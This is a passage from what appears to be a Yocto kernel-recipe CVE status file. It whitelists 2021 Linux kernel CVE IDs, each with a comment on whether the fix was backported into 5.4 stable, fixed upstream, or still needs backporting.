5226CVE_CHECK_WHITELIST += "CVE-2021-28950"
5227
5228# fixed-version: only affects 5.10rc1 onwards
5229CVE_CHECK_WHITELIST += "CVE-2021-28951"
5230
5231# fixed-version: only affects 5.7rc1 onwards
5232CVE_CHECK_WHITELIST += "CVE-2021-28952"
5233
5234# cpe-stable-backport: Backported in 5.4.108
5235CVE_CHECK_WHITELIST += "CVE-2021-28964"
5236
5237# cpe-stable-backport: Backported in 5.4.108
5238CVE_CHECK_WHITELIST += "CVE-2021-28971"
5239
5240# cpe-stable-backport: Backported in 5.4.108
5241CVE_CHECK_WHITELIST += "CVE-2021-28972"
5242
5243# cpe-stable-backport: Backported in 5.4.111
5244CVE_CHECK_WHITELIST += "CVE-2021-29154"
5245
5246# CVE-2021-29155 needs backporting (fixed from 5.12rc8)
5247
5248# cpe-stable-backport: Backported in 5.4.109
5249CVE_CHECK_WHITELIST += "CVE-2021-29264"
5250
5251# cpe-stable-backport: Backported in 5.4.106
5252CVE_CHECK_WHITELIST += "CVE-2021-29265"
5253
5254# fixed-version: only affects 5.8rc1 onwards
5255CVE_CHECK_WHITELIST += "CVE-2021-29266"
5256
5257# fixed-version: only affects 5.5rc1 onwards
5258CVE_CHECK_WHITELIST += "CVE-2021-29646"
5259
5260# cpe-stable-backport: Backported in 5.4.109
5261CVE_CHECK_WHITELIST += "CVE-2021-29647"
5262
5263# fixed-version: only affects 5.11rc1 onwards
5264CVE_CHECK_WHITELIST += "CVE-2021-29648"
5265
5266# fixed-version: only affects 5.10rc1 onwards
5267CVE_CHECK_WHITELIST += "CVE-2021-29649"
5268
5269# cpe-stable-backport: Backported in 5.4.109
5270CVE_CHECK_WHITELIST += "CVE-2021-29650"
5271
5272# fixed-version: only affects 5.10rc1 onwards
5273CVE_CHECK_WHITELIST += "CVE-2021-29657"
5274
5275# cpe-stable-backport: Backported in 5.4.103
5276CVE_CHECK_WHITELIST += "CVE-2021-30002"
5277
5278# fixed-version: only affects 5.12rc1 onwards
5279CVE_CHECK_WHITELIST += "CVE-2021-30178"
5280
5281# fixed-version: only affects 5.7rc1 onwards
5282CVE_CHECK_WHITELIST += "CVE-2021-31440"
5283
5284# cpe-stable-backport: Backported in 5.4.92
5285CVE_CHECK_WHITELIST += "CVE-2021-3178"
5286
5287# cpe-stable-backport: Backported in 5.4.117
5288CVE_CHECK_WHITELIST += "CVE-2021-31829"
5289
5290# cpe-stable-backport: Backported in 5.4.109
5291CVE_CHECK_WHITELIST += "CVE-2021-31916"
5292
5293# CVE-2021-32078 needs backporting (fixed from 5.13rc1)
5294
5295# cpe-stable-backport: Backported in 5.4.119
5296CVE_CHECK_WHITELIST += "CVE-2021-32399"
5297
5298# fixed-version: only affects 5.11rc1 onwards
5299CVE_CHECK_WHITELIST += "CVE-2021-32606"
5300
5301# cpe-stable-backport: Backported in 5.4.106
5302CVE_CHECK_WHITELIST += "CVE-2021-33033"
5303
5304# cpe-stable-backport: Backported in 5.4.119
5305CVE_CHECK_WHITELIST += "CVE-2021-33034"
5306
5307# CVE-2021-33061 needs backporting (fixed from 5.18rc1)
5308
5309# cpe-stable-backport: Backported in 5.4.124
5310CVE_CHECK_WHITELIST += "CVE-2021-33098"
5311
5312# fixed-version: only affects 5.11rc1 onwards
5313CVE_CHECK_WHITELIST += "CVE-2021-33135"
5314
5315# fixed-version: only affects 5.12rc8 onwards
5316CVE_CHECK_WHITELIST += "CVE-2021-33200"
5317
5318# cpe-stable-backport: Backported in 5.4.94
5319CVE_CHECK_WHITELIST += "CVE-2021-3347"
5320
5321# cpe-stable-backport: Backported in 5.4.95
5322CVE_CHECK_WHITELIST += "CVE-2021-3348"
5323
5324# cpe-stable-backport: Backported in 5.4.139
5325CVE_CHECK_WHITELIST += "CVE-2021-33624"
5326
5327# fixed-version: Fixed after version 5.4rc1
5328CVE_CHECK_WHITELIST += "CVE-2021-33630"
5329
5330# cpe-stable-backport: Backported in 5.4.240
5331CVE_CHECK_WHITELIST += "CVE-2021-33631"
5332
5333# cpe-stable-backport: Backported in 5.4.205
5334CVE_CHECK_WHITELIST += "CVE-2021-33655"
5335
5336# cpe-stable-backport: Backported in 5.4.202
5337CVE_CHECK_WHITELIST += "CVE-2021-33656"
5338
5339# cpe-stable-backport: Backported in 5.4.134
5340CVE_CHECK_WHITELIST += "CVE-2021-33909"
5341
5342# fixed-version: only affects 5.5rc1 onwards
5343CVE_CHECK_WHITELIST += "CVE-2021-3411"
5344
5345# cpe-stable-backport: Backported in 5.4.62
5346CVE_CHECK_WHITELIST += "CVE-2021-3428"
5347
5348# cpe-stable-backport: Backported in 5.4.101
5349CVE_CHECK_WHITELIST += "CVE-2021-3444"
5350
5351# cpe-stable-backport: Backported in 5.4.146
5352CVE_CHECK_WHITELIST += "CVE-2021-34556"
5353
5354# cpe-stable-backport: Backported in 5.4.128
5355CVE_CHECK_WHITELIST += "CVE-2021-34693"
5356
5357# cpe-stable-backport: Backported in 5.4.110
5358CVE_CHECK_WHITELIST += "CVE-2021-3483"
5359
5360# fixed-version: only affects 5.8rc1 onwards
5361CVE_CHECK_WHITELIST += "CVE-2021-34866"
5362
5363# fixed-version: only affects 5.8rc1 onwards
5364CVE_CHECK_WHITELIST += "CVE-2021-3489"
5365
5366# fixed-version: only affects 5.7rc1 onwards
5367CVE_CHECK_WHITELIST += "CVE-2021-3490"
5368
5369# fixed-version: only affects 5.7rc1 onwards
5370CVE_CHECK_WHITELIST += "CVE-2021-3491"
5371
5372# CVE-2021-3492 has no known resolution
5373
5374# CVE-2021-3493 needs backporting (fixed from 5.11rc1)
5375
5376# cpe-stable-backport: Backported in 5.4.124
5377CVE_CHECK_WHITELIST += "CVE-2021-34981"
5378
5379# fixed-version: only affects 5.9rc1 onwards
5380CVE_CHECK_WHITELIST += "CVE-2021-3501"
5381
5382# cpe-stable-backport: Backported in 5.4.129
5383CVE_CHECK_WHITELIST += "CVE-2021-35039"
5384
5385# cpe-stable-backport: Backported in 5.4.118
5386CVE_CHECK_WHITELIST += "CVE-2021-3506"
5387
5388# CVE-2021-3542 has no known resolution
5389
5390# fixed-version: only affects 5.10rc1 onwards
5391CVE_CHECK_WHITELIST += "CVE-2021-3543"
5392
5393# cpe-stable-backport: Backported in 5.4.146
5394CVE_CHECK_WHITELIST += "CVE-2021-35477"
5395
5396# cpe-stable-backport: Backported in 5.4.125
5397CVE_CHECK_WHITELIST += "CVE-2021-3564"
5398
5399# cpe-stable-backport: Backported in 5.4.125
5400CVE_CHECK_WHITELIST += "CVE-2021-3573"
5401
5402# cpe-stable-backport: Backported in 5.4.125
5403CVE_CHECK_WHITELIST += "CVE-2021-3587"
5404
5405# cpe-stable-backport: Backported in 5.4.98
5406CVE_CHECK_WHITELIST += "CVE-2021-3600"
5407
5408# cpe-stable-backport: Backported in 5.4.132
5409CVE_CHECK_WHITELIST += "CVE-2021-3609"
5410
5411# cpe-stable-backport: Backported in 5.4.102
5412CVE_CHECK_WHITELIST += "CVE-2021-3612"
5413
5414# cpe-stable-backport: Backported in 5.4.14
5415CVE_CHECK_WHITELIST += "CVE-2021-3635"
5416
5417# cpe-stable-backport: Backported in 5.4.160
5418CVE_CHECK_WHITELIST += "CVE-2021-3640"
5419
5420# cpe-stable-backport: Backported in 5.4.142
5421CVE_CHECK_WHITELIST += "CVE-2021-3653"
5422
5423# cpe-stable-backport: Backported in 5.4.133
5424CVE_CHECK_WHITELIST += "CVE-2021-3655"
5425
5426# cpe-stable-backport: Backported in 5.4.142
5427CVE_CHECK_WHITELIST += "CVE-2021-3656"
5428
5429# cpe-stable-backport: Backported in 5.4.112
5430CVE_CHECK_WHITELIST += "CVE-2021-3659"
5431
5432# CVE-2021-3669 needs backporting (fixed from 5.15rc1)
5433
5434# cpe-stable-backport: Backported in 5.4.136
5435CVE_CHECK_WHITELIST += "CVE-2021-3679"
5436
5437# CVE-2021-3714 has no known resolution
5438
5439# cpe-stable-backport: Backported in 5.4.29
5440CVE_CHECK_WHITELIST += "CVE-2021-3715"
5441
5442# cpe-stable-backport: Backported in 5.4.151
5443CVE_CHECK_WHITELIST += "CVE-2021-37159"
5444
5445# cpe-stable-backport: Backported in 5.4.141
5446CVE_CHECK_WHITELIST += "CVE-2021-3732"
5447
5448# fixed-version: only affects 5.14rc1 onwards
5449CVE_CHECK_WHITELIST += "CVE-2021-3736"
5450
5451# cpe-stable-backport: Backported in 5.4.144
5452CVE_CHECK_WHITELIST += "CVE-2021-3739"
5453
5454# cpe-stable-backport: Backported in 5.4.128
5455CVE_CHECK_WHITELIST += "CVE-2021-3743"
5456
5457# cpe-stable-backport: Backported in 5.4.151
5458CVE_CHECK_WHITELIST += "CVE-2021-3744"
5459
5460# cpe-stable-backport: Backported in 5.4.160
5461CVE_CHECK_WHITELIST += "CVE-2021-3752"
5462
5463# cpe-stable-backport: Backported in 5.4.144
5464CVE_CHECK_WHITELIST += "CVE-2021-3753"
5465
5466# cpe-stable-backport: Backported in 5.4.136
5467CVE_CHECK_WHITELIST += "CVE-2021-37576"
5468
5469# cpe-stable-backport: Backported in 5.4.224
5470CVE_CHECK_WHITELIST += "CVE-2021-3759"
5471
5472# cpe-stable-backport: Backported in 5.4.156
5473CVE_CHECK_WHITELIST += "CVE-2021-3760"
5474
5475# cpe-stable-backport: Backported in 5.4.151
5476CVE_CHECK_WHITELIST += "CVE-2021-3764"
5477
5478# cpe-stable-backport: Backported in 5.4.157
5479CVE_CHECK_WHITELIST += "CVE-2021-3772"
5480
5481# cpe-stable-backport: Backported in 5.4.134
5482CVE_CHECK_WHITELIST += "CVE-2021-38160"
5483
5484# fixed-version: only affects 5.6rc1 onwards
5485CVE_CHECK_WHITELIST += "CVE-2021-38166"
5486
5487# cpe-stable-backport: Backported in 5.4.141
5488CVE_CHECK_WHITELIST += "CVE-2021-38198"
5489
5490# cpe-stable-backport: Backported in 5.4.134
5491CVE_CHECK_WHITELIST += "CVE-2021-38199"
5492
5493# fixed-version: only affects 5.11rc1 onwards
5494CVE_CHECK_WHITELIST += "CVE-2021-38200"
5495
5496# fixed-version: only affects 5.11rc1 onwards
5497CVE_CHECK_WHITELIST += "CVE-2021-38201"
5498
5499# fixed-version: only affects 5.13rc1 onwards
5500CVE_CHECK_WHITELIST += "CVE-2021-38202"
5501
5502# fixed-version: only affects 5.13rc1 onwards
5503CVE_CHECK_WHITELIST += "CVE-2021-38203"
5504
5505# cpe-stable-backport: Backported in 5.4.136
5506CVE_CHECK_WHITELIST += "CVE-2021-38204"
5507
5508# cpe-stable-backport: Backported in 5.4.141
5509CVE_CHECK_WHITELIST += "CVE-2021-38205"
5510
5511# fixed-version: only affects 5.9rc1 onwards
5512CVE_CHECK_WHITELIST += "CVE-2021-38206"
5513
5514# fixed-version: only affects 5.6rc4 onwards
5515CVE_CHECK_WHITELIST += "CVE-2021-38207"
5516
5517# cpe-stable-backport: Backported in 5.4.125
5518CVE_CHECK_WHITELIST += "CVE-2021-38208"
5519
5520# fixed-version: only affects 5.7rc1 onwards
5521CVE_CHECK_WHITELIST += "CVE-2021-38209"
5522
5523# cpe-stable-backport: Backported in 5.4.153
5524CVE_CHECK_WHITELIST += "CVE-2021-38300"
5525
5526# CVE-2021-3847 has no known resolution
5527
5528# CVE-2021-3864 has no known resolution
5529
5530# CVE-2021-3892 has no known resolution
5531
5532# cpe-stable-backport: Backported in 5.4.155
5533CVE_CHECK_WHITELIST += "CVE-2021-3894"
5534
5535# cpe-stable-backport: Backported in 5.4.156
5536CVE_CHECK_WHITELIST += "CVE-2021-3896"
5537
5538# cpe-stable-backport: Backported in 5.4.171
5539CVE_CHECK_WHITELIST += "CVE-2021-3923"
5540
5541# cpe-stable-backport: Backported in 5.4.144
5542CVE_CHECK_WHITELIST += "CVE-2021-39633"
5543
5544# cpe-stable-backport: Backported in 5.4.70
5545CVE_CHECK_WHITELIST += "CVE-2021-39634"
5546
5547# fixed-version: Fixed after version 4.16rc1
5548CVE_CHECK_WHITELIST += "CVE-2021-39636"
5549
5550# cpe-stable-backport: Backported in 5.4.89
5551CVE_CHECK_WHITELIST += "CVE-2021-39648"
5552
5553# cpe-stable-backport: Backported in 5.4.106
5554CVE_CHECK_WHITELIST += "CVE-2021-39656"
5555
5556# cpe-stable-backport: Backported in 5.4.93
5557CVE_CHECK_WHITELIST += "CVE-2021-39657"
5558
5559# cpe-stable-backport: Backported in 5.4.165
5560CVE_CHECK_WHITELIST += "CVE-2021-39685"
5561
5562# cpe-stable-backport: Backported in 5.4.160
5563CVE_CHECK_WHITELIST += "CVE-2021-39686"
5564
5565# cpe-stable-backport: Backported in 5.4.165
5566CVE_CHECK_WHITELIST += "CVE-2021-39698"
5567
5568# fixed-version: Fixed after version 4.18rc6
5569CVE_CHECK_WHITELIST += "CVE-2021-39711"
5570
5571# fixed-version: Fixed after version 4.20rc1
5572CVE_CHECK_WHITELIST += "CVE-2021-39713"
5573
5574# fixed-version: Fixed after version 4.12rc1
5575CVE_CHECK_WHITELIST += "CVE-2021-39714"
5576
5577# CVE-2021-39800 has no known resolution
5578
5579# CVE-2021-39801 has no known resolution
5580
5581# CVE-2021-39802 has no known resolution
5582
5583# fixed-version: only affects 5.5rc1 onwards
5584CVE_CHECK_WHITELIST += "CVE-2021-4001"
5585
5586# cpe-stable-backport: Backported in 5.4.162
5587CVE_CHECK_WHITELIST += "CVE-2021-4002"
5588
5589# CVE-2021-4023 needs backporting (fixed from 5.15rc1)
5590
5591# fixed-version: only affects 5.10rc1 onwards
5592CVE_CHECK_WHITELIST += "CVE-2021-4028"
5593
5594# fixed-version: only affects 5.15rc1 onwards
5595CVE_CHECK_WHITELIST += "CVE-2021-4032"
5596
5597# cpe-stable-backport: Backported in 5.4.241
5598CVE_CHECK_WHITELIST += "CVE-2021-4037"
5599
5600# cpe-stable-backport: Backported in 5.4.145
5601CVE_CHECK_WHITELIST += "CVE-2021-40490"
5602
5603# cpe-stable-backport: Backported in 5.4.164
5604CVE_CHECK_WHITELIST += "CVE-2021-4083"
5605
5606# fixed-version: only affects 5.11rc1 onwards
5607CVE_CHECK_WHITELIST += "CVE-2021-4090"
5608
5609# fixed-version: only affects 5.11rc1 onwards
5610CVE_CHECK_WHITELIST += "CVE-2021-4093"
5611
5612# fixed-version: only affects 5.12rc1 onwards
5613CVE_CHECK_WHITELIST += "CVE-2021-4095"
5614
5615# fixed-version: only affects 5.10rc1 onwards
5616CVE_CHECK_WHITELIST += "CVE-2021-41073"
5617
5618# cpe-stable-backport: Backported in 5.4.168
5619CVE_CHECK_WHITELIST += "CVE-2021-4135"
5620
5621# CVE-2021-4148 needs backporting (fixed from 5.15)
5622
5623# cpe-stable-backport: Backported in 5.4.155
5624CVE_CHECK_WHITELIST += "CVE-2021-4149"
5625
5626# CVE-2021-4150 needs backporting (fixed from 5.15rc7)
5627
5628# cpe-stable-backport: Backported in 5.4.134
5629CVE_CHECK_WHITELIST += "CVE-2021-4154"
5630
5631# cpe-stable-backport: Backported in 5.4.171
5632CVE_CHECK_WHITELIST += "CVE-2021-4155"
5633
5634# cpe-stable-backport: Backported in 5.4.120
5635CVE_CHECK_WHITELIST += "CVE-2021-4157"
5636
5637# cpe-stable-backport: Backported in 5.4.210
5638CVE_CHECK_WHITELIST += "CVE-2021-4159"
5639
5640# cpe-stable-backport: Backported in 5.4.153
5641CVE_CHECK_WHITELIST += "CVE-2021-41864"
5642
5643# cpe-stable-backport: Backported in 5.4.189
5644CVE_CHECK_WHITELIST += "CVE-2021-4197"
5645
5646# cpe-stable-backport: Backported in 5.4.143
5647CVE_CHECK_WHITELIST += "CVE-2021-42008"
5648
5649# cpe-stable-backport: Backported in 5.4.162
5650CVE_CHECK_WHITELIST += "CVE-2021-4202"
5651
5652# cpe-stable-backport: Backported in 5.4.151
5653CVE_CHECK_WHITELIST += "CVE-2021-4203"
5654
5655# fixed-version: only affects 5.8rc1 onwards
5656CVE_CHECK_WHITELIST += "CVE-2021-4204"
5657
5658# CVE-2021-4218 needs backporting (fixed from 5.8rc1)
5659
5660# cpe-stable-backport: Backported in 5.4.148
5661CVE_CHECK_WHITELIST += "CVE-2021-42252"
5662
5663# fixed-version: only affects 5.10rc1 onwards
5664CVE_CHECK_WHITELIST += "CVE-2021-42327"
5665
5666# cpe-stable-backport: Backported in 5.4.158
5667CVE_CHECK_WHITELIST += "CVE-2021-42739"
5668
5669# cpe-stable-backport: Backported in 5.4.156
5670CVE_CHECK_WHITELIST += "CVE-2021-43056"
5671
5672# fixed-version: only affects 5.13rc1 onwards
5673CVE_CHECK_WHITELIST += "CVE-2021-43057"
5674
5675# fixed-version: only affects 5.10rc1 onwards
5676CVE_CHECK_WHITELIST += "CVE-2021-43267"
5677
5678# cpe-stable-backport: Backported in 5.4.156
5679CVE_CHECK_WHITELIST += "CVE-2021-43389"
5680
5681# cpe-stable-backport: Backported in 5.4.164
5682CVE_CHECK_WHITELIST += "CVE-2021-43975"
5683
5684# cpe-stable-backport: Backported in 5.4.174
5685CVE_CHECK_WHITELIST += "CVE-2021-43976"
5686
5687# cpe-stable-backport: Backported in 5.4.170
5688CVE_CHECK_WHITELIST += "CVE-2021-44733"
5689
5690# cpe-stable-backport: Backported in 5.4.260
5691CVE_CHECK_WHITELIST += "CVE-2021-44879"
5692
5693# cpe-stable-backport: Backported in 5.4.171
5694CVE_CHECK_WHITELIST += "CVE-2021-45095"
5695
5696# fixed-version: only affects 5.15rc1 onwards
5697CVE_CHECK_WHITELIST += "CVE-2021-45100"
5698
5699# fixed-version: only affects 5.7rc1 onwards
5700CVE_CHECK_WHITELIST += "CVE-2021-45402"
5701
5702# cpe-stable-backport: Backported in 5.4.169
5703CVE_CHECK_WHITELIST += "CVE-2021-45469"
5704
5705# fixed-version: only affects 5.13rc4 onwards
5706CVE_CHECK_WHITELIST += "CVE-2021-45480"
5707
5708# cpe-stable-backport: Backported in 5.4.133
5709CVE_CHECK_WHITELIST += "CVE-2021-45485"
5710
5711# cpe-stable-backport: Backported in 5.4.119
5712CVE_CHECK_WHITELIST += "CVE-2021-45486"
5713
5714# cpe-stable-backport: Backported in 5.4.160
5715CVE_CHECK_WHITELIST += "CVE-2021-45868"
5716
5717# fixed-version: only affects 5.7rc1 onwards
5718CVE_CHECK_WHITELIST += "CVE-2021-46283"
5719
5720# cpe-stable-backport: Backported in 5.4.112
5721CVE_CHECK_WHITELIST += "CVE-2021-46904"
5722
5723# fixed-version: only affects 5.12rc7 onwards
5724CVE_CHECK_WHITELIST += "CVE-2021-46905"
5725
5726# cpe-stable-backport: Backported in 5.4.127
5727CVE_CHECK_WHITELIST += "CVE-2021-46906"
5728
5729# CVE-2021-46908 needs backporting (fixed from 5.12rc8)
5730
5731# cpe-stable-backport: Backported in 5.4.114
5732CVE_CHECK_WHITELIST += "CVE-2021-46909"
5733
5734# fixed-version: only affects 5.11rc1 onwards
5735CVE_CHECK_WHITELIST += "CVE-2021-46910"
5736
5737# fixed-version: only affects 5.7rc1 onwards
5738CVE_CHECK_WHITELIST += "CVE-2021-46911"
5739
5740# fixed-version: only affects 5.7rc1 onwards
5741CVE_CHECK_WHITELIST += "CVE-2021-46912"
5742
5743# fixed-version: only affects 5.7rc1 onwards
5744CVE_CHECK_WHITELIST += "CVE-2021-46913"
5745
5746# fixed-version: only affects 5.9rc1 onwards
5747CVE_CHECK_WHITELIST += "CVE-2021-46914"
5748
5749# cpe-stable-backport: Backported in 5.4.114
5750CVE_CHECK_WHITELIST += "CVE-2021-46915"
5751
5752# fixed-version: only affects 5.11rc1 onwards
5753CVE_CHECK_WHITELIST += "CVE-2021-46916"
5754
5755# fixed-version: only affects 5.8rc6 onwards
5756CVE_CHECK_WHITELIST += "CVE-2021-46917"
5757
5758# fixed-version: only affects 5.11rc1 onwards
5759CVE_CHECK_WHITELIST += "CVE-2021-46918"
5760
5761# fixed-version: only affects 5.6rc1 onwards
5762CVE_CHECK_WHITELIST += "CVE-2021-46919"
5763
5764# fixed-version: only affects 5.6rc1 onwards
5765CVE_CHECK_WHITELIST += "CVE-2021-46920"
5766
5767# cpe-stable-backport: Backported in 5.4.115
5768CVE_CHECK_WHITELIST += "CVE-2021-46921"
5769
5770# fixed-version: only affects 5.12rc1 onwards
5771CVE_CHECK_WHITELIST += "CVE-2021-46922"
5772
5773# fixed-version: only affects 5.12rc1 onwards
5774CVE_CHECK_WHITELIST += "CVE-2021-46923"
5775
5776# cpe-stable-backport: Backported in 5.4.170
5777CVE_CHECK_WHITELIST += "CVE-2021-46924"
5778
5779# CVE-2021-46925 needs backporting (fixed from 5.16rc8)
5780
5781# CVE-2021-46926 needs backporting (fixed from 5.16rc7)
5782
5783# fixed-version: only affects 5.15rc1 onwards
5784CVE_CHECK_WHITELIST += "CVE-2021-46927"
5785
5786# CVE-2021-46928 needs backporting (fixed from 5.16rc7)
5787
5788# cpe-stable-backport: Backported in 5.4.170
5789CVE_CHECK_WHITELIST += "CVE-2021-46929"
5790
5791# cpe-stable-backport: Backported in 5.4.170
5792CVE_CHECK_WHITELIST += "CVE-2021-46930"
5793
5794# fixed-version: only affects 5.7rc1 onwards
5795CVE_CHECK_WHITELIST += "CVE-2021-46931"
5796
5797# cpe-stable-backport: Backported in 5.4.170
5798CVE_CHECK_WHITELIST += "CVE-2021-46932"
5799
5800# cpe-stable-backport: Backported in 5.4.170
5801CVE_CHECK_WHITELIST += "CVE-2021-46933"
5802
5803# cpe-stable-backport: Backported in 5.4.170
5804CVE_CHECK_WHITELIST += "CVE-2021-46934"
5805
5806# cpe-stable-backport: Backported in 5.4.170
5807CVE_CHECK_WHITELIST += "CVE-2021-46935"
5808
5809# cpe-stable-backport: Backported in 5.4.170
5810CVE_CHECK_WHITELIST += "CVE-2021-46936"
5811
5812# fixed-version: only affects 5.15rc1 onwards
5813CVE_CHECK_WHITELIST += "CVE-2021-46937"
5814
5815# cpe-stable-backport: Backported in 5.4.118
5816CVE_CHECK_WHITELIST += "CVE-2021-46938"
5817
5818# cpe-stable-backport: Backported in 5.4.118
5819CVE_CHECK_WHITELIST += "CVE-2021-46939"
5820
5821# fixed-version: only affects 5.10rc4 onwards
5822CVE_CHECK_WHITELIST += "CVE-2021-46940"
5823
5824# CVE-2021-46941 needs backporting (fixed from 5.13rc1)
5825
5826# fixed-version: only affects 5.12rc1 onwards
5827CVE_CHECK_WHITELIST += "CVE-2021-46942"
5828
5829# cpe-stable-backport: Backported in 5.4.118
5830CVE_CHECK_WHITELIST += "CVE-2021-46943"
5831
5832# cpe-stable-backport: Backported in 5.4.118
5833CVE_CHECK_WHITELIST += "CVE-2021-46944"
5834
5835# fixed-version: only affects 5.11rc1 onwards
5836CVE_CHECK_WHITELIST += "CVE-2021-46945"
5837
5838# fixed-version: only affects 5.12rc1 onwards
5839CVE_CHECK_WHITELIST += "CVE-2021-46947"
5840
5841# fixed-version: only affects 5.10rc1 onwards
5842CVE_CHECK_WHITELIST += "CVE-2021-46948"
5843
5844# fixed-version: only affects 5.10rc1 onwards
5845CVE_CHECK_WHITELIST += "CVE-2021-46949"
5846
5847# cpe-stable-backport: Backported in 5.4.118
5848CVE_CHECK_WHITELIST += "CVE-2021-46950"
5849
5850# cpe-stable-backport: Backported in 5.4.118
5851CVE_CHECK_WHITELIST += "CVE-2021-46951"
5852
5853# CVE-2021-46952 needs backporting (fixed from 5.13rc1)
5854
5855# cpe-stable-backport: Backported in 5.4.118
5856CVE_CHECK_WHITELIST += "CVE-2021-46953"
5857
5858# fixed-version: only affects 5.11rc1 onwards
5859CVE_CHECK_WHITELIST += "CVE-2021-46954"
5860
5861# cpe-stable-backport: Backported in 5.4.118
5862CVE_CHECK_WHITELIST += "CVE-2021-46955"
5863
5864# cpe-stable-backport: Backported in 5.4.118
5865CVE_CHECK_WHITELIST += "CVE-2021-46956"
5866
5867# fixed-version: only affects 5.12rc1 onwards
5868CVE_CHECK_WHITELIST += "CVE-2021-46957"
5869
5870# fixed-version: only affects 5.7rc4 onwards
5871CVE_CHECK_WHITELIST += "CVE-2021-46958"
5872
5873# CVE-2021-46959 needs backporting (fixed from 5.13rc1)
5874
5875# cpe-stable-backport: Backported in 5.4.118
5876CVE_CHECK_WHITELIST += "CVE-2021-46960"
5877
5878# cpe-stable-backport: Backported in 5.4.118
5879CVE_CHECK_WHITELIST += "CVE-2021-46961"
5880
5881# cpe-stable-backport: Backported in 5.4.118
5882CVE_CHECK_WHITELIST += "CVE-2021-46962"
5883
5884# fixed-version: only affects 5.5rc1 onwards
5885CVE_CHECK_WHITELIST += "CVE-2021-46963"
5886
5887# fixed-version: only affects 5.11rc1 onwards
5888CVE_CHECK_WHITELIST += "CVE-2021-46964"
5889
5890# CVE-2021-46965 needs backporting (fixed from 5.13rc1)
5891
5892# cpe-stable-backport: Backported in 5.4.118
5893CVE_CHECK_WHITELIST += "CVE-2021-46966"
5894
5895# fixed-version: only affects 5.8rc1 onwards
5896CVE_CHECK_WHITELIST += "CVE-2021-46967"
5897
5898# fixed-version: only affects 5.10rc3 onwards
5899CVE_CHECK_WHITELIST += "CVE-2021-46968"
5900
5901# CVE-2021-46969 needs backporting (fixed from 5.13rc1)
5902
5903# CVE-2021-46970 needs backporting (fixed from 5.13rc1)
5904
5905# cpe-stable-backport: Backported in 5.4.117
5906CVE_CHECK_WHITELIST += "CVE-2021-46971"
5907
5908# fixed-version: only affects 5.8rc1 onwards
5909CVE_CHECK_WHITELIST += "CVE-2021-46972"
5910
5911# fixed-version: only affects 5.8rc1 onwards
5912CVE_CHECK_WHITELIST += "CVE-2021-46973"
5913
5914# cpe-stable-backport: Backported in 5.4.117
5915CVE_CHECK_WHITELIST += "CVE-2021-46974"
5916
5917# fixed-version: only affects 5.8rc1 onwards
5918CVE_CHECK_WHITELIST += "CVE-2021-46976"
5919
5920# fixed-version: only affects 5.5rc1 onwards
5921CVE_CHECK_WHITELIST += "CVE-2021-46977"
5922
5923# fixed-version: only affects 5.11rc3 onwards
5924CVE_CHECK_WHITELIST += "CVE-2021-46978"
5925
5926# fixed-version: only affects 5.11rc1 onwards
5927CVE_CHECK_WHITELIST += "CVE-2021-46979"
5928
5929# fixed-version: only affects 5.8rc1 onwards
5930CVE_CHECK_WHITELIST += "CVE-2021-46980"
5931
5932# cpe-stable-backport: Backported in 5.4.120
5933CVE_CHECK_WHITELIST += "CVE-2021-46981"
5934
5935# CVE-2021-46982 needs backporting (fixed from 5.13rc2)
5936
5937# fixed-version: only affects 5.9rc1 onwards
5938CVE_CHECK_WHITELIST += "CVE-2021-46983"
5939
5940# cpe-stable-backport: Backported in 5.4.120
5941CVE_CHECK_WHITELIST += "CVE-2021-46984"
5942
5943# fixed-version: only affects 5.12rc5 onwards
5944CVE_CHECK_WHITELIST += "CVE-2021-46985"
5945
5946# fixed-version: only affects 5.10rc1 onwards
5947CVE_CHECK_WHITELIST += "CVE-2021-46986"
5948
5949# fixed-version: only affects 5.9rc1 onwards
5950CVE_CHECK_WHITELIST += "CVE-2021-46987"
5951
5952# cpe-stable-backport: Backported in 5.4.120
5953CVE_CHECK_WHITELIST += "CVE-2021-46988"
5954
5955# cpe-stable-backport: Backported in 5.4.120
5956CVE_CHECK_WHITELIST += "CVE-2021-46989"
5957
5958# fixed-version: only affects 5.10rc5 onwards
5959CVE_CHECK_WHITELIST += "CVE-2021-46990"
5960
5961# cpe-stable-backport: Backported in 5.4.120
5962CVE_CHECK_WHITELIST += "CVE-2021-46991"
5963
5964# cpe-stable-backport: Backported in 5.4.120
5965CVE_CHECK_WHITELIST += "CVE-2021-46992"
5966
5967# cpe-stable-backport: Backported in 5.4.120
5968CVE_CHECK_WHITELIST += "CVE-2021-46993"
5969
5970# fixed-version: only affects 5.5rc1 onwards
5971CVE_CHECK_WHITELIST += "CVE-2021-46994"
5972
5973# fixed-version: only affects 5.12rc1 onwards
5974CVE_CHECK_WHITELIST += "CVE-2021-46995"
5975
5976# fixed-version: only affects 5.10rc1 onwards
5977CVE_CHECK_WHITELIST += "CVE-2021-46996"
5978
5979# fixed-version: only affects 5.10rc7 onwards
5980CVE_CHECK_WHITELIST += "CVE-2021-46997"
5981
5982# cpe-stable-backport: Backported in 5.4.120
5983CVE_CHECK_WHITELIST += "CVE-2021-46998"
5984
5985# fixed-version: only affects 5.7rc3 onwards
5986CVE_CHECK_WHITELIST += "CVE-2021-46999"
5987
5988# fixed-version: only affects 5.8rc1 onwards
5989CVE_CHECK_WHITELIST += "CVE-2021-47000"
5990
5991# fixed-version: only affects 5.5rc1 onwards
5992CVE_CHECK_WHITELIST += "CVE-2021-47001"
5993
5994# fixed-version: only affects 5.11rc1 onwards
5995CVE_CHECK_WHITELIST += "CVE-2021-47002"
5996
5997# fixed-version: only affects 5.11 onwards
5998CVE_CHECK_WHITELIST += "CVE-2021-47003"
5999
6000# CVE-2021-47004 needs backporting (fixed from 5.13rc1)
6001
6002# CVE-2021-47005 needs backporting (fixed from 5.13rc1)
6003
6004# cpe-stable-backport: Backported in 5.4.120
6005CVE_CHECK_WHITELIST += "CVE-2021-47006"
6006
6007# fixed-version: only affects 5.8rc1 onwards
6008CVE_CHECK_WHITELIST += "CVE-2021-47007"
6009
6010# fixed-version: only affects 5.11rc1 onwards
6011CVE_CHECK_WHITELIST += "CVE-2021-47008"
6012
6013# fixed-version: only affects 5.12rc1 onwards
6014CVE_CHECK_WHITELIST += "CVE-2021-47009"
6015
6016# cpe-stable-backport: Backported in 5.4.119
6017CVE_CHECK_WHITELIST += "CVE-2021-47010"
6018
6019# fixed-version: only affects 5.11rc5 onwards
6020CVE_CHECK_WHITELIST += "CVE-2021-47011"
6021
6022# cpe-stable-backport: Backported in 5.4.119
6023CVE_CHECK_WHITELIST += "CVE-2021-47012"
6024
6025# cpe-stable-backport: Backported in 5.4.119
